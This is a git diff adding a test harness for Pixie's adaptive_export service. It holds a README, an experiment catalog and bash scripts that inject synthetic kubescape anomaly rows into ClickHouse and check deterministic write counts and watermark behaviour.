+| Control plane E2 (dedup) | ✅ **10/10 EXACT** (uniq=1, attrib=1) |
+| Control plane E6 (restart idempotency) | ✅ **1/1 EXACT** (attrib stayed 1 across AE restart) |
+| **Control plane total** | ✅ **71/71 reps EXACT (std=0)** + **E1 20/20 seconds-native** |
+| E8 sustained same-pod (control) | ✅ reproduces F8 (stall when event_time ≤ watermark) + recovers to steady delta=1 growth |
+| Data plane E5 + E8-data | ⛔ blocked on F6 (vizier not registered); data-plane rig requested from makefile-agent; harness ready |
+| L1 hermetic (`go test`, exact bytes) | 🧰 authored; runs on a build PG (pixie module compile) |
+
+NOTE: harness is now **seconds-native** (production unit). The earlier 71/71 used nanos + a compensating
+TTL ALTER; E1 was re-confirmed **20/20 std=0 natively with seconds** + the seconds-correct DDL (no ALTER).
diff --git a/src/e2e_test/adaptive_export_loadtest/README.md b/src/e2e_test/adaptive_export_loadtest/README.md
new file mode 100644
index 00000000000..f0e94a54fdf
--- /dev/null
+++ b/src/e2e_test/adaptive_export_loadtest/README.md
@@ -0,0 +1,72 @@
+# adaptive_export_loadtest
+
+Load-test + e2e harness for **adaptive_export (AE)** and the dx-steered SOC chain.
+There are exactly **two ways to test**, by design — pick by what you're proving:
+
+| family | needs a live SOC stack? | proves | entry point |
+|---|---|---|---|
+| **A. Fixture-isolation** | No (just ClickHouse) | AE's write behaviour is *deterministic* — injected `kubescape_logs` → exact `forensic_db` rows, across many reps | `harness/run.sh` |
+| **B. Live-attack e2e** | Yes (Pixie + kubescape + CH + AE + dx) | the real chain: attack → detection → DX-steered data-volume reduction → no-loss → NFR | `harness/log4shell_fire.sh` → `exp_matrix.sh` → `nfr.sh` → `exp_row_reconcile.sh` |
+
+`event_time` is unix **SECONDS** end-to-end (the unit the soc Vector kubescape sink emits and the CH DDL TTL/PARTITION assume). Fixtures use seconds.
+
+---
+
+## A. Fixture-isolation (offline AE proof — no Pixie)
+
+Injects *controlled* `kubescape_logs` trigger rows (real kubescape is **not** deployed) and a *counted* traffic band, then asserts exactly how much AE writes — so write behaviour is measured deterministically instead of lost in infra noise.
+
+```sh
+export KUBECONFIG= # or run lab-side with CH_NO_PF=1
+bash harness/run.sh # full suite: ae_config → E1..E4,E6 → E5
+EXP=E1 REPS=20 OUT=/tmp/E1.csv bash harness/exp_control.sh # one experiment
+EXP=E8 TICKS=25 INTERVAL=3 bash harness/exp_e8.sh # sustained same-pod (F8 reproducer)
+```
+Exact reproducibility ⇔ `harness/stats.py` reports every `*_act` metric with one distinct value (std=0).
+
+**Scripts:** `run.sh` (orchestrator) · `lib.sh` (CH/kubectl helpers) · `inject.sh` (HTTP INSERT of kubescape_logs) · `ae_config.sh` (AE single-shot load-test mode) · `exp_control.sh` (E1–E4,E6) · `exp_e5.sh` (data-plane volume) · `exp_e8.sh` (sustained same-pod / F8) · `stats.py` (reproducibility verdict).
+
+## B. Live-attack e2e (the real chain, on a deployed stack)
+
+Run on a SOC stack (Pixie vizier Healthy + kubescape netStreaming + CH `forensic_db` + AE + dx). Order:
+
+```sh
+export KUBECONFIG=
+# 1. generate the attack signal (idempotent; verifies LDAP egress before returning)
+bash harness/log4shell_fire.sh
+# 2. data-volume reduction MATRIX — ALL (firehose) vs DX (steered) × {log4shell,argocd,react2argo}
+CONDITIONS="log4shell:on react2argo:on" REPS=5 bash harness/exp_matrix.sh
+# 3. NFR — throughput, AE+dx memory under load, verdict/query latency
+bash harness/nfr.sh
+# 4. no-loss — deterministic PEM↔ClickHouse row-level reconciliation for the DX arm
+bash harness/exp_row_reconcile.sh
+```
+
+**Scripts:** `log4shell_fire.sh` (attack-signal generator, bob#140-hardened) · `exp_matrix.sh` (reduction matrix, the canonical ALL-vs-DX runner) · `nfr.sh` (throughput/mem/latency) · `exp_row_reconcile.sh` (no-loss).
+
+> The DX arm needs the load-gen pods bound to a **benign User SBoB** (`kubescape.io/managed-by: User`, `rulePolicies.R0002.processAllowed`) or benign noise gets steered and contaminates the reduction — see `biz/PoC/log4j/datavolume/denoise_sbobs/`.
+
+---
+
+## Layout
+```
+fixtures/EXPERIMENTS.md curated kubescape_logs data-set catalog + expected outputs
+harness/ the two families above
+k8s/ isolated sinks + per-rep generator pod (no probes)
+tools/loadgen/ cleanloadgen + httpsink Go sources + Dockerfile
+```
+Go unit/e2e tests for AE live with the service: `src/vizier/services/adaptive_export/internal/{trigger,e2e}/*_test.go`.
+
+See `CONTRACTS.md` (AE implied contracts) and `FINDINGS_AND_BACKLOG.md` (reproduced findings incl. the F8 watermark-poison bug).
+
+## Validation status (honest)
+
+| Experiment | Plane | Status |
+|---|---|---|
+| E1 single / E2 dedup / E3 fan-out / E4 boundary / E6 restart-idempotency | control | ✅ exactly reproducible (std=0) on a live rig |
+| E8 sustained same-pod | control | ✅ reproduced the F8 "writes-stop" bug + recovery |
+| E5 volume / E8 data-mode | data | ⏳ authored; pending live validation |
+| Live log4j reduction / NFR / no-loss (family B) | data | ✅ validated (aeprod19 + pemdq10 + dx): #33 prefetch verdict 212→18ms; reduction ALL→DX ≫ measured |
+
+## Removed (consolidation 2026-06)
+Redundant variants folded into the canonical scripts above — deleted: `ae_vs_all.sh`, `vrun.sh`, `exp_log4j_reps.sh`, `exp_datavolume_extreme.sh`, `exp_dx_steering_reduction.sh` (→ `exp_matrix.sh`); `exp_ae_nfr_benchmark.sh` (→ `nfr.sh`); `exp_pipeline_reconcile.sh` (→ `exp_row_reconcile.sh`); `exp_dx_validate.sh` (→ `exp_matrix.sh`); `deploy_ae.sh`, `build_gen_image.sh` (superseded by the live stack / kit).
diff --git a/src/e2e_test/adaptive_export_loadtest/fixtures/EXPERIMENTS.md b/src/e2e_test/adaptive_export_loadtest/fixtures/EXPERIMENTS.md
new file mode 100644
index 00000000000..35629485c37
--- /dev/null
+++ b/src/e2e_test/adaptive_export_loadtest/fixtures/EXPERIMENTS.md
@@ -0,0 +1,45 @@
+# AE load-test experiment catalog
+
+Each experiment is a curated `kubescape_logs` data set (injected via `inject.sh`,
+real kubescape NOT deployed) plus the deterministic AE output it must produce.
+Run each ×100; **exact reproducibility ⇔ every metric has std = 0 / one distinct
+value across the 100 reps.**
+
+Two planes (see `project_ae_repro_planes`):
+- **Control plane** — `adaptive_attribution`, `trigger_watermark`: a pure
+ function of the injected rows. No Pixie, no traffic gen needed.
+- **Data plane** — `http_events`/`dns_events`/`pgsql_events`/`conn_stats`: real
+ Pixie capture of `cleanloadgen`'s sealed band; gen manifest counts are the
+ oracle. Requires the L3 topology + single-pull AE config.
+
+Per-rep isolation: unique `--hostname aw--` (control, watermark is
+host-partitioned) and unique `--pod gen--` (data, AE's `df.pod` filter
+isolates each rep even with overlapping windows). Timestamps are explicit unix
+nanos — fixtures NEVER use wall-clock `now()`.
+
+| # | Plane | Injected data set | Expected (per rep, exact unless noted) |
+|---|---|---|---|
+| **E1** single anomaly | control | 1 row: rule R0001, target (ns,pod), pid/comm fixed, `event_time=T` | `uniqExact(anomaly_hash)=1`; `adaptive_attribution` FINAL `=1`; watermark `=T` |
+| **E2** dedup / extend | control | 10 rows, SAME (pid,comm,pod,ns), distinct ↑ `event_time` (`--count 10`) | hashes `=1`; attribution FINAL `=1` (t_end extended, not multiplied); watermark `=T+9·dt` |
+| **E3** fan-out | control | K=8 rows, distinct (pod,ns), 1 each | hashes `=8`; attribution FINAL `=8` |
+| **E4** boundary collision | control | 2 rows, identical `event_time`, different RuleID, same target (`--same-time`) | deterministic fingerprint-dedup: both surface (distinct fp), hashes `=1`; watermark `=T` |
+| **E5** data-plane volume | data | 1 anomaly, `pod=gen-…`, `event_time=B1` from gen manifest; gen fires HTTP_N=100/DNS_N=100/PGSQL_N=100 in band `[B0,B1]` | `Δhttp_events=100`, `Δdns_events=100`, `Δpgsql_events=100`; `Δattribution=1`; `conn_stats` within tolerance; single-pull (no MergeTree dup inflation) |
+| **E6** watermark idempotency | control | inject E1 set, let AE process, restart AE (watermark persisted), re-run | 2nd pass: `Δ` everything `=0` (no double-count) |
+| **E7** passthrough A/B | data | canned band; `ADAPTIVE_PASSTHROUGH` 1 then 0, same load+window | exact firehose/filter ratio per table; reproducible across reps |
+
+## Timestamp coordination (data-plane, E5/E7)
+
+1. gen fires → sealed band `[B0,B1]` (node clock == Pixie `time_` == kubescape
+ `event_time`; no skew).
+2. inject fixture `--event-time B1 --pod gen--`.
+3. AE config: `ADAPTIVE_WINDOW_BEFORE_SEC ≥ (B1−B0)/1e9 + margin` so window start
+ `≤ B0`; `ADAPTIVE_WINDOW_AFTER_SEC` small → window expires after ONE pull
+ (protocol tables are plain MergeTree — repeated pulls would re-insert dups).
+4. measure forensic_db deltas BEFORE the band ages out of Pixie retention.
+5. delete `gen--` (held alive until here so upid resolves).
+
+## Default knobs
+
+- `HTTP_N=DNS_N=PGSQL_N=100` (low enough for 100% Pixie sampling, no drops).
+- `conn_stats` tolerance: `Δconn ∈ [HTTP_N, HTTP_N+5]` (new-conn-per-req + 1 pg).
+- `async_insert=0` on the ingest user so counts are stable at read time.
diff --git a/src/e2e_test/adaptive_export_loadtest/harness/ae_config.sh b/src/e2e_test/adaptive_export_loadtest/harness/ae_config.sh
new file mode 100755
index 00000000000..1f7782e927f
--- /dev/null
+++ b/src/e2e_test/adaptive_export_loadtest/harness/ae_config.sh
@@ -0,0 +1,57 @@
+#!/usr/bin/env bash
+
+# Copyright 2018- The Pixie Authors.
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+#
+# SPDX-License-Identifier: Apache-2.0
+
+# ae_config.sh — put the live adaptive-export into deterministic load-test mode.
+#
+# Sets (and rolls out) the env that makes the data-plane write exactly once per
+# anomaly window over the full sealed band:
+# ADAPTIVE_PUSH_PIXIE_ROWS=true operator pulls + writes protocol tables
+# ADAPTIVE_PUSH_REFRESH_SEC=-1 SINGLE-SHOT: one pull per window (only on
+# a rebuilt AE image carrying the new knob;
+# harmless/ignored on older images)
+# ADAPTIVE_WINDOW_BEFORE_SEC=120 window start ≤ band start (band is seconds)
+# ADAPTIVE_WINDOW_AFTER_SEC=5 member lifetime — the PRIMARY single-pull
+# lever that works on the CURRENTLY-PUBLISHED
+# image: 5s < the 30s default refresh, so the
+# window expires before any 2nd pull → each
+# window written exactly once.
+# Also disables async_insert on the ingest user so row counts are stable at read
+# time (per the AE per-PG fixes), and applies the PL_CLOUD_ADDR :443 fix.
+set -uo pipefail
+HERE="$(cd "$(dirname "${BASH_SOURCE[0]}")" && pwd)"; source "$HERE/lib.sh"
+
+DS="${AE_DS:-adaptive-export}"
+log "configuring $AE_NS/$DS for single-shot load-test mode"
+
+k -n "$AE_NS" set env "ds/$DS" \
+ ADAPTIVE_PUSH_PIXIE_ROWS=true \
+ ADAPTIVE_PUSH_REFRESH_SEC=-1 \
+ ADAPTIVE_WINDOW_BEFORE_SEC=120 \
+ ADAPTIVE_WINDOW_AFTER_SEC=5 \
+ >/dev/null
+
+# PL_CLOUD_ADDR :443 fix (idempotent) — without it AE crashloops / 0 writes.
+CUR="$(k -n "$AE_NS" get cm pl-cloud-config -o jsonpath='{.data.PL_CLOUD_ADDR}' 2>/dev/null || true)"
+if [[ -n "$CUR" && "$CUR" != *:* ]]; then
+ log "patching PL_CLOUD_ADDR $CUR -> ${CUR}:443"
+ k -n "$AE_NS" patch cm pl-cloud-config --type merge -p "{\"data\":{\"PL_CLOUD_ADDR\":\"${CUR}:443\"}}" >/dev/null
+fi
+
+k -n "$AE_NS" rollout restart "ds/$DS" >/dev/null
+k -n "$AE_NS" rollout status "ds/$DS" --timeout=180s
+log "AE configured + rolled out"
diff --git a/src/e2e_test/adaptive_export_loadtest/harness/exp_control.sh b/src/e2e_test/adaptive_export_loadtest/harness/exp_control.sh
new file mode 100755
index 00000000000..783aad584d0
--- /dev/null
+++ b/src/e2e_test/adaptive_export_loadtest/harness/exp_control.sh
@@ -0,0 +1,115 @@
+#!/usr/bin/env bash
+
+# Copyright 2018- The Pixie Authors.
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+#
+# SPDX-License-Identifier: Apache-2.0
+
+# exp_control.sh — control-plane reproducibility (E1..E4, E6). No Pixie, no gen:
+# inject curated kubescape_logs fixtures and assert the deterministic control
+# surface (adaptive_attribution FINAL + uniqExact(anomaly_hash) + watermark).
+#
+# Live-AE constraint: hostname MUST be a real node (AE polls per-node). Per-rep
+# isolation is by UNIQUE POD (distinct anomaly_hash) + monotone event_time.
+#
+# Usage: EXP=E1 REPS=100 OUT=/tmp/e1.csv ./exp_control.sh (EXP in E1 E2 E3 E4 E6)
+set -uo pipefail
+HERE="$(cd "$(dirname "${BASH_SOURCE[0]}")" && pwd)"; source "$HERE/lib.sh"
+INJECT="$HERE/inject.sh"
+
+EXP="${EXP:-E1}"
+REPS="${REPS:-100}"
+NODE="${NODE:-$(first_node)}"
+OUT="${OUT:-/tmp/aeload_${EXP}.csv}"
+
+ch_portforward_up
+[[ -n "$NODE" ]] || die "no node resolved (set NODE=)"
+log "EXP=$EXP node=$NODE reps=$REPS"
+warmup "$NODE" # absorb AE trigger cold-start so rep 1 is steady-state
+
+inj(){ "$INJECT" --endpoint "$CH_HTTP" --user "$CH_RW_USER" --pass "$CH_RW_PASS" --hostname "$NODE" "$@" >&2; }
+# settle: give AE's 250ms trigger poll + write time to land.
+settle(){ sleep "${SETTLE_S:-3}"; }
+
+echo "rep,exp,uniq_exp,uniq_act,attrib_exp,attrib_act,wm_exp,wm_act,pass" | tee "$OUT"
+WM_PREV=0 # for monotonicity check (trigger_watermark persists on a ~5s throttle)
+
+for rep in $(seq 1 "$REPS"); do
+ # event_time = REAL current second. The trigger watermark is a strict
+ # high-water-mark (contract C3 / F8): future-dated stamps (BASE+rep*N) push
+ # the watermark ahead of wall-clock, so later experiments' now-based stamps
+ # fall BELOW it and are silently dropped. now_s keeps the watermark tracking
+ # real time → monotone across experiments on the same (per-node) hostname.
+ T="$(now_s)"
+ R="$(printf '%03d' "$rep")" # zero-pad → collision-proof LIKE filters
+ filt=""; uexp=1; aexp=1; wmexp="$T"; idemp=""
+ case "$EXP" in
+ E1) # single anomaly
+ filt="cp-e1-${R}"
+ inj --ns aeload --pod "$filt" --rule R0001 --pid 1234 --comm java --event-time "$T" || { echo "$rep,$EXP,,,,,,,INJECT_FAIL"|tee -a "$OUT"; continue; }
+ ;;
+ E2) # dedup / extend: 10 rows, same target, 1s apart → 1 hash, 1 row
+ filt="cp-e2-${R}"; wmexp="$((T + 9))"
+ inj --ns aeload --pod "$filt" --rule R0001 --pid 1234 --comm java --event-time "$T" --count 10 --dt-s 1 || { echo "$rep,$EXP,,,,,,,INJECT_FAIL"|tee -a "$OUT"; continue; }
+ sleep 8 # let all 10 rows (spanning 9s) be polled before measuring
+ ;;
+ E3) # fan-out: 8 distinct pods → 8 hashes. Same event_time (now_s) for all 8 —
+ # distinct pods → distinct content fingerprints → all 8 surface (boundary
+ # dedup is per-fingerprint), and the watermark only advances to now_s.
+ filt="cp-e3-${R}-"; K=8; uexp="$K"; aexp="$K"; wmexp=""
+ ok=1
+ for j in $(seq 1 "$K"); do
+ inj --ns aeload --pod "${filt}${j}" --rule R0001 --pid "$((1234+j))" --comm java --event-time "$T" || ok=0
+ done
+ [[ "$ok" == 1 ]] || { echo "$rep,$EXP,,,,,,,INJECT_FAIL"|tee -a "$OUT"; continue; }
+ ;;
+ E4) # boundary collision: 2 rows, same event_time, different RuleID, same target → 1 hash
+ filt="cp-e4-${R}"
+ inj --ns aeload --pod "$filt" --rule R0001 --pid 1234 --comm java --event-time "$T" --same-time || true
+ inj --ns aeload --pod "$filt" --rule R0010 --pid 1234 --comm java --event-time "$T" --same-time || { echo "$rep,$EXP,,,,,,,INJECT_FAIL"|tee -a "$OUT"; continue; }
+ ;;
+ E6) # watermark idempotency across AE restart
+ filt="cp-e6-${R}"
+ inj --ns aeload --pod "$filt" --rule R0001 --pid 1234 --comm java --event-time "$T" || { echo "$rep,$EXP,,,,,,,INJECT_FAIL"|tee -a "$OUT"; continue; }
+ wait_attrib "$NODE" "$filt" 1 20 >/dev/null
+ a1="$(attrib_count "$NODE" "$filt")"
+ k -n "$AE_NS" rollout restart "ds/${AE_DS:-adaptive-export}" >/dev/null 2>&1 || true
+ k -n "$AE_NS" rollout status "ds/${AE_DS:-adaptive-export}" --timeout=180s >/dev/null 2>&1 || true
+ sleep 8
+ # idempotency: attribution still exactly 1 after restart (no double-count)
+ [[ "$a1" == "1" ]] || idemp="FAIL_idemp_a1=${a1}"
+ ;;
+ *) die "unknown EXP=$EXP";;
+ esac
+
+ # Poll until AE has written the expected attribution rows (steady-state),
+ # then read the deterministic counts. wm is persistence-throttled (~5s) so it
+ # is reported + checked for MONOTONICITY only, never a hard gate.
+ aact="$(wait_attrib "$NODE" "$filt" "$aexp" "${MEAS_TIMEOUT:-25}")"
+ uact="$(uniq_hashes "$NODE" "$filt")"
+ wm="$(watermark_of "$NODE")"
+
+ pass="PASS"
+ [[ "$uact" == "$uexp" ]] || pass="FAIL_uniq"
+ [[ "$aact" == "$aexp" ]] || pass="${pass}|FAIL_attrib"
+ [[ -z "$idemp" ]] || pass="${pass}|${idemp}"
+ # watermark: must never go backwards (persisted value lags but is monotone).
+ if [[ "${wm:-0}" -lt "${WM_PREV:-0}" ]]; then pass="${pass}|FAIL_wm_regress"; fi
+ WM_PREV="$wm"
+
+ echo "$rep,$EXP,$uexp,$uact,$aexp,$aact,$wmexp,$wm,$pass" | tee -a "$OUT"
+done
+
+log "$EXP done -> $OUT"
+python3 "$HERE/stats.py" "$OUT" || true
diff --git a/src/e2e_test/adaptive_export_loadtest/harness/exp_e5.sh b/src/e2e_test/adaptive_export_loadtest/harness/exp_e5.sh
new file mode 100755
index 00000000000..d9237672aa5
--- /dev/null
+++ b/src/e2e_test/adaptive_export_loadtest/harness/exp_e5.sh
@@ -0,0 +1,98 @@
+#!/usr/bin/env bash
+
+# Copyright 2018- The Pixie Authors.
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+#
+# SPDX-License-Identifier: Apache-2.0
+
+# exp_e5.sh — E5 live data-plane reproducibility: real Pixie captures a counted,
+# sealed, pod-pinned band; AE pulls it ONCE; we assert the forensic_db deltas
+# equal the generator's ground truth, across REPS reps.
+#
+# Output CSV (stdout + $OUT): rep,http_exp,http_act,dns_exp,dns_act,pgsql_exp,
+# pgsql_act,conn_est,conn_act,attrib,uniq_hash,wm_exp,wm_act,pass
+#
+# Usage: REPS=100 HTTP_N=100 DNS_N=100 PGSQL_N=100 OUT=/tmp/e5.csv ./exp_e5.sh
+set -uo pipefail
+HERE="$(cd "$(dirname "${BASH_SOURCE[0]}")" && pwd)"; source "$HERE/lib.sh"
+INJECT="$HERE/inject.sh"
+
+REPS="${REPS:-100}"
+HTTP_N="${HTTP_N:-100}"; DNS_N="${DNS_N:-100}"; PGSQL_N="${PGSQL_N:-100}"
+CONN_TOL="${CONN_TOL:-5}" # conn_stats tolerance band above HTTP_N+1
+SETTLE_S="${SETTLE_S:-4}" # Stirling flush settle before injecting
+PULL_TIMEOUT="${PULL_TIMEOUT:-40}" # max wait for AE single-pull to land
+OUT="${OUT:-/tmp/aeload_e5.csv}"
+
+ch_portforward_up
+apply_sinks
+# Absorb the AE trigger cold-start on every node (gen pods may land on any node).
+for n in $(nodes_list); do warmup "$n"; done
+
+echo "rep,http_exp,http_act,dns_exp,dns_act,pgsql_exp,pgsql_act,conn_est,conn_act,attrib,uniq_hash,wm_exp,wm_act,pass" | tee "$OUT"
+
+for rep in $(seq 1 "$REPS"); do
+ name="gen-e5-$(printf '%03d' "$rep")" # zero-pad → collision-proof LIKE filter
+
+ mani="$(fire_gen "$name" "$HTTP_N" "$DNS_N" "$PGSQL_N")" || { echo "$rep,,,,,,,,,,,,,FIRE_FAIL" | tee -a "$OUT"; continue; }
+ b1="$(jget "$mani" b1)" # band end, unix NANOS (gen clock)
+ b1_s=$(( b1 / 1000000000 )) # → unix SECONDS = production event_time unit
+ http_exp="$(jget "$mani" http)"; dns_exp="$(jget "$mani" dns)"; pgsql_exp="$(jget "$mani" pgsql)"
+ conn_est="$(jget "$mani" conn_tcp_est)"
+ # Fixture hostname MUST be the node the gen pod landed on, so the AE pod on
+ # that node reads the trigger (AE polls kubescape_logs WHERE hostname=node).
+ node="$(jget "$mani" node)"
+ [[ -n "$node" ]] || { del_gen "$name"; echo "$rep,,,,,,,,,,,,,NO_NODE" | tee -a "$OUT"; continue; }
+
+ sleep "$SETTLE_S" # let the band flush into Pixie before the window query
+
+ # Inject the single trigger fixture pinned to THIS rep's pod, event_time=B1.
+ "$INJECT" --endpoint "$CH_HTTP" --user "$CH_RW_USER" --pass "$CH_RW_PASS" \
+ --ns "$AELOAD_NS" --pod "$name" --rule R0001 --pid 1234 --comm java \
+ --event-time "$b1_s" --hostname "$node" >&2 \
+ || { del_gen "$name"; echo "$rep,,,,,,,,,,,,,INJECT_FAIL" | tee -a "$OUT"; continue; }
+
+ # Wait for AE's single pull to land (http_events for this pod reaches exp, or
+ # timeout). The pod stays alive (held) so upid resolves during the pull.
+ http_act=0
+ for _ in $(seq 1 "$PULL_TIMEOUT"); do
+ http_act="$(count_pod http_events "$name")"
+ [[ "$http_act" -ge "$http_exp" ]] && break
+ sleep 1
+ done
+ dns_act="$(count_pod dns_events "$name")"
+ pgsql_act="$(count_pod pgsql_events "$name")"
+ conn_act="$(count_pod conn_stats "$name")"
+ attrib="$(attrib_count "$node" "$name")"
+ uhash="$(uniq_hashes "$node" "$name")"
+ wm_act="$(watermark_of "$node")"
+
+ pass="PASS"
+ [[ "$http_act" == "$http_exp" ]] || pass="FAIL_http"
+ [[ "$dns_act" == "$dns_exp" ]] || pass="${pass}|FAIL_dns"
+ [[ "$pgsql_act" == "$pgsql_exp" ]] || pass="${pass}|FAIL_pgsql"
+ [[ "$attrib" == "1" ]] || pass="${pass}|FAIL_attrib"
+ # watermark persists on a ~5s throttle → report only (WARN), don't hard-gate.
+ [[ "$wm_act" == "$b1_s" ]] || pass="${pass}|WARN_wm"
+ # conn_stats: tolerance gate (sampled cumulative counters), not exact.
+ if [[ "$conn_act" -lt "$conn_est" || "$conn_act" -gt $((conn_est + CONN_TOL)) ]]; then
+ pass="${pass}|WARN_conn"
+ fi
+
+ echo "$rep,$http_exp,$http_act,$dns_exp,$dns_act,$pgsql_exp,$pgsql_act,$conn_est,$conn_act,$attrib,$uhash,$b1_s,$wm_act,$pass" | tee -a "$OUT"
+ del_gen "$name"
+done
+
+log "E5 done -> $OUT"
+python3 "$HERE/stats.py" "$OUT" || true
diff --git a/src/e2e_test/adaptive_export_loadtest/harness/exp_e8.sh b/src/e2e_test/adaptive_export_loadtest/harness/exp_e8.sh
new file mode 100755
index 00000000000..e194733f932
--- /dev/null
+++ b/src/e2e_test/adaptive_export_loadtest/harness/exp_e8.sh
@@ -0,0 +1,98 @@
+#!/usr/bin/env bash
+
+# Copyright 2018- The Pixie Authors.
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+#
+# SPDX-License-Identifier: Apache-2.0
+
+# exp_e8.sh — SUSTAINED same-pod-over-time: the bug-hunt for "writes succeed
+# initially, then STOP, while the data is still on the Pixie side."
+#
+# One long-lived pod keeps producing NEW kubescape anomalies over time. A healthy
+# AE keeps processing every new anomaly: adaptive_attribution.n_anomalies grows,
+# last_seen advances, the active window stays open, and (data mode) protocol rows
+# keep being written. A STALL — n_anomalies / last_seen freezing while we keep
+# injecting — reproduces the production symptom.
+#
+# MODE=control (default): inject anomalies + track n_anomalies/last_seen/watermark
+# over TICKS. No Pixie needed. Catches a trigger/watermark/dedup-side stall.
+# MODE=data: ALSO run a held gen pod producing continuous HTTP/DNS/PGSQL traffic,
+# and track per-pod protocol-table row growth (needs a registered vizier).
+#
+# event_time is unix SECONDS (production unit). BURST>1 injects BURST anomalies at
+# the SAME event_time per tick — the realistic "many R0001 in one second" shape
+# that probes the watermark-boundary fingerprint dedup (prime suspect).
+#
+# Usage: MODE=control TICKS=40 INTERVAL=3 BURST=1 OUT=/tmp/e8.csv ./exp_e8.sh
+set -uo pipefail
+HERE="$(cd "$(dirname "${BASH_SOURCE[0]}")" && pwd)"; source "$HERE/lib.sh"
+INJECT="$HERE/inject.sh"
+
+MODE="${MODE:-control}"
+TICKS="${TICKS:-40}"
+INTERVAL="${INTERVAL:-3}" # seconds between ticks
+BURST="${BURST:-1}" # anomalies per tick (same event_time if >1)
+NODE="${NODE:-$(first_node)}"
+OUT="${OUT:-/tmp/aeload_e8_${MODE}.csv}"
+POD="${POD:-sus-$(now_s)}" # the one sustained pod under test
+
+ch_portforward_up
+[[ -n "$NODE" ]] || die "no node resolved"
+log "E8 sustained: mode=$MODE node=$NODE pod=$POD ticks=$TICKS interval=${INTERVAL}s burst=$BURST"
+warmup "$NODE"
+
+GEN=""
+if [[ "$MODE" == "data" ]]; then
+ apply_sinks
+ GEN="$POD" # the gen pod name == the fixture pod (df.pod filter isolates it)
+ # Long-lived gen that keeps firing: we re-fire by leaving it running and
+ # re-injecting triggers; the gen's band is its startup burst, but the active
+ # window re-queries the SAME pod each tick. (Continuous-traffic gen variant is
+ # a follow-up; this already exercises sustained re-query of one pod.)
+ fire_gen "$GEN" "${HTTP_N:-100}" "${DNS_N:-100}" "${PGSQL_N:-100}" >/dev/null || die "gen fire failed"
+ node="$(k -n "$AELOAD_NS" get pod "$GEN" -o jsonpath='{.spec.nodeName}' 2>/dev/null)"; [[ -n "$node" ]] && NODE="$node"
+ log "data mode: gen $GEN on node $NODE"
+fi
+
+echo "tick,t_unix,event_time,n_anomalies,last_seen,watermark,http_rows,delta_n,status" | tee "$OUT"
+prev_n=0
+for tick in $(seq 1 "$TICKS"); do
+ T="$(now_s)"
+ # Inject BURST anomalies for the SAME pod at this tick's event_time.
+ if [[ "$BURST" -gt 1 ]]; then
+ "$INJECT" --endpoint "$CH_HTTP" --user "$CH_RW_USER" --pass "$CH_RW_PASS" \
+ --hostname "$NODE" --ns "$AELOAD_NS" --pod "$POD" --rule R0001 --pid 1234 --comm java \
+ --event-time "$T" --count "$BURST" --same-time >&2 || true
+ else
+ "$INJECT" --endpoint "$CH_HTTP" --user "$CH_RW_USER" --pass "$CH_RW_PASS" \
+ --hostname "$NODE" --ns "$AELOAD_NS" --pod "$POD" --rule R0001 --pid 1234 --comm java \
+ --event-time "$T" >&2 || true
+ fi
+ sleep "$INTERVAL"
+
+ n="$(attr_field "$NODE" "$POD" n_anomalies)"
+ ls="$(attr_field "$NODE" "$POD" 'toUnixTimestamp(last_seen)')"
+ wm="$(watermark_of "$NODE")"
+ http="0"; [[ "$MODE" == "data" ]] && http="$(count_pod http_events "$POD")"
+ delta=$(( ${n:-0} - prev_n ))
+ status="OK"
+ [[ "$tick" -gt 1 && "$delta" -le 0 ]] && status="STALL" # n_anomalies stopped growing
+ prev_n="${n:-0}"
+ echo "$tick,$T,$T,$n,$ls,$wm,$http,$delta,$status" | tee -a "$OUT"
+done
+
+[[ "$MODE" == "data" && -n "$GEN" ]] && del_gen "$GEN"
+log "E8 done -> $OUT"
+# Summary: did it ever stall, and at which tick?
+awk -F, 'NR>1{tot++; if($9=="STALL")stall++} END{printf "[aeload] E8 %s: %d ticks, %d STALL ticks (%s)\n", "'"$MODE"'", tot, stall+0, (stall+0==0?"sustained-OK":"STALLED — reproduces writes-stop")}' "$OUT"
diff --git a/src/e2e_test/adaptive_export_loadtest/harness/exp_matrix.sh b/src/e2e_test/adaptive_export_loadtest/harness/exp_matrix.sh
new file mode 100755
index 00000000000..de8a068713a
--- /dev/null
+++ b/src/e2e_test/adaptive_export_loadtest/harness/exp_matrix.sh
@@ -0,0 +1,126 @@
+#!/usr/bin/env bash
+
+# Copyright 2018- The Pixie Authors.
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+#
+# SPDX-License-Identifier: Apache-2.0
+
+# exp_matrix.sh — data-volume reduction MATRIX, runs node-side on the rig.
